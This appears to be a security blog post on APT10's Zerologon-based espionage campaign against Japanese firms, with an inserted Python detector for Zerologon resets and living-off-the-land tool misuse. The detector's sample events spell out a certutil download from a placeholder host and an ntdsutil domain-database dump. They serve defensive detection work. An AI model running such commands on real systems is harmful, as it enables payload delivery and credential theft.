A Chinese cyberespionage group known as Red Apollo or APT 10 has been observed to be active again, abusing the Windows Zerologon vulnerability. Japanese companies and their subsidiaries, spanning multiple industry sectors and located in 17 regions worldwide, are being targeted by this APT group.
Attackers ran this malicious campaign from October last year to October 2020, mostly using DLL side-loading, with the Hartip backdoor being employed by the threat actors.
- After exploiting vulnerable devices, the attackers now use Zerologon exploits to steal domain credentials and gain full control over the entire domain.
- Custom loaders deliver payloads across all of the targets' networks. The attackers also use living-off-the-land tools such as Certutil, Adfind, Csvde, Ntdsutil, WMIExec, and PowerShell, obfuscation techniques, and the QuasarRAT malware.
- The time threat actors spent in compromised networks varied greatly, ranging from days to months.
- In certain cases they remained hidden within their victims' networks for more than a year, demonstrating the attackers' sophistication and capabilities.
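The two tradecraft points above (Zerologon credential theft and the named living-off-the-land tools) can both be surfaced from standard Windows Security logs. The following detection logic is an added example, not code from the article or from eScan; the event records are constructed and simplified, and the per-tool argument patterns are assumptions a team would tune to its own environment.

```python
import re

# Constructed sample records (not from the article), simplified from Windows
# Security Event 4742 (computer account changed) and 4688 (process creation).
SAMPLE_EVENTS = [
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC01$"},
    {"EventID": 4742, "SubjectUserName": "svc_join", "TargetUserName": "WS07$"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": "ntdsutil ifm create full C:\\temp\\dump"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://example.invalid/a.dat a.dat"},
    {"EventID": 4688, "NewProcessName": r"C:\Tools\AdFind.exe",
     "CommandLine": "adfind -f objectcategory=computer"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify server.cer"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Assumed argument patterns that separate attacker-style use from routine admin
# use; None means any invocation is notable (adfind/csvde rarely run on workstations).
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "ntdsutil.exe": re.compile(r"\bifm\b", re.I),  # NTDS.dit snapshot = credential dump
    "adfind.exe": None,
    "csvde.exe": None,
    "wmiexec.exe": None,
}


def detect(events):
    """Return (rule, detail) tuples for events matching the reported tradecraft."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 4742:
            # A Zerologon reset changes a machine account password without
            # authenticating, so the subject is ANONYMOUS LOGON and the target
            # is a computer account (name ends with '$').
            target = ev.get("TargetUserName", "")
            if ev.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON" and target.endswith("$"):
                findings.append(("zerologon_machine_account_reset", target))
        elif ev.get("EventID") == 4688:
            image = ev.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
            if image not in LOLBIN_PATTERNS:
                continue
            pattern = LOLBIN_PATTERNS[image]
            if pattern is None or pattern.search(ev.get("CommandLine", "")):
                findings.append(("suspicious_lolbin_use", image))
    return findings
```

On a patched domain controller, Zerologon attempts also produce the dedicated Netlogon events 5827 to 5829, which are worth collecting alongside 4742.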
It has been noticed that targets based in North America, South Asia, and East Asia are constantly being targeted by China-based attackers.
Other recent attacks:
- According to the FBI, Chinese state-sponsored hackers targeted US computer networks last month, including those involved in national defense.
- In another case, government-sector networks in Southeast Asia were targeted by a complex espionage attack leveraging a complete arsenal of droppers, backdoors, and other tools, including the Chinoxy backdoor, PcShare RAT, and FunnyDream backdoor binaries.
It is quite evident that this Chinese cyberespionage group has come alive again with more sophistication than before. Consequently, our internal experts suggest developing and implementing appropriate prevention, detection, and mitigation strategies, and reviewing the network perimeter to identify any ongoing suspicious activity.
To read more, please check the eScan Blog.